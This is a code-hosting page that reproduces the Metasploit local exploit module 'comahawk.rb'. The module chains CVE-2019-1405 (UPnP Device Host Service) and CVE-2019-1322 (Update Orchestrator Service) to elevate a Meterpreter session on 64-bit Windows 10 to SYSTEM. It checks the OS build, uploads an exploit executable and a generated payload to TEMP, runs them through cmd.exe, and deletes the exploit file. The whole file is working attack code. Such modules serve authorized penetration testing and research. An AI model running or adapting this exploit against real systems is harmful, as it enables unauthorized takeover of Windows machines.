Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/local/comahawk.rb
Views: 11655
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Msf::Post::Common9include Msf::Post::File10include Msf::Post::Windows::Priv11include Msf::Exploit::EXE1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'Microsoft UPnP Local Privilege Elevation Vulnerability',18'Description' => %q{19This exploit uses two vulnerabilities to execute a command as an elevated user.20The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to21NT AUTHORITY\LOCAL SERVICE22The second (CVE-2019-1322) leverages the Update Orchestrator Service to23elevate from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM.24},25'License' => MSF_LICENSE,26'Author' => [27'NCC Group', # Original discovery (https://www.nccgroup.trust/uk/)28'hoangprod', # PoC29'bwatters-r7' # msf module30],31'Platform' => ['win'],32'SessionTypes' => ['meterpreter'],33'Targets' => [34['Windows x64', { 'Arch' => ARCH_X64 }]35],36'DefaultTarget' => 0,37'DisclosureDate' => '2019-11-12',38'References' => [39['CVE', '2019-1322'],40['CVE', '2019-1405'],41['EDB', '47684'],42['URL', 'https://github.com/apt69/COMahawk'],43['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/'],44['URL', 'https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1']45],46'DefaultOptions' => {47'DisablePayloadHandler' => false48},49'Compat' => {50'Meterpreter' => {51'Commands' => %w[52stdapi_sys_config_getenv53]54}55}56)57)5859register_options([60OptString.new('EXPLOIT_NAME',61[false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),62OptString.new('PAYLOAD_NAME',63[false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),64OptString.new('WRITABLE_DIR',65[false, 'Path to write binaries (%TEMP% by default).', nil]),66OptInt.new('EXPLOIT_TIMEOUT',67[true, 'The number of seconds to wait for exploit to finish running', 60]),68OptInt.new('EXECUTE_DELAY',69[true, 'The number of seconds to delay between file upload and exploit launch', 3])70])71end7273def exploit74exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..14)75payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14)76exploit_name = "#{exploit_name}.exe" unless exploit_name.end_with?('.exe')77payload_name = "#{payload_name}.exe" unless payload_name.end_with?('.exe')78temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP')79payload_path = "#{temp_path}\\#{payload_name}"80exploit_path = "#{temp_path}\\#{exploit_name}"81payload_exe = generate_payload_exe8283# Check target84vprint_status('Checking Target')85validate_active_host86validate_target87fail_with(Failure::BadConfig, "#{temp_path} does not exist on the target") unless directory?(temp_path)8889# Upload Exploit90vprint_status("Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}")91ensure_clean_destination(exploit_path)92exploit_bin = exploit_data('cve-2019-1322', 'CVE-2019-1322-EXE.exe')93write_file(exploit_path, exploit_bin)94print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")9596# Upload Payload97vprint_status('Uploading Payload')98ensure_clean_destination(payload_path)99write_file(payload_path, payload_exe)100print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")101print_warning("This exploit requires manual cleanup of the payload #{payload_path}")102103# Run Exploit104vprint_status('Running Exploit')105print_status('It may take a moment after the session is established for the exploit to exit safely.')106begin107cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}", 60)108rescue Rex::TimeoutError => e109elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)110print_error('Caught timeout. Exploit may be taking longer or it may have failed.')111end112vprint_status("Cleaning up #{exploit_path}")113ensure_clean_destination(exploit_path)114end115116def validate_active_host117print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")118rescue Rex::Post::Meterpreter::RequestError => e119elog('Could not connect to session', error: e)120raise Msf::Exploit::Failed, 'Could not connect to session'121end122123def validate_target124if sysinfo['Architecture'] == ARCH_X86125fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')126end127version = get_version_info128vprint_status("OS version: #{version}")129unless version.build_number.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_1809)130fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17133-18362')131end132end133134def ensure_clean_destination(path)135return unless file?(path)136137print_status("#{path} already exists on the target. Deleting...")138begin139file_rm(path)140print_status("Deleted #{path}")141rescue Rex::Post::Meterpreter::RequestError => e142elog(e)143print_error("Unable to delete #{path}")144end145end146end147148149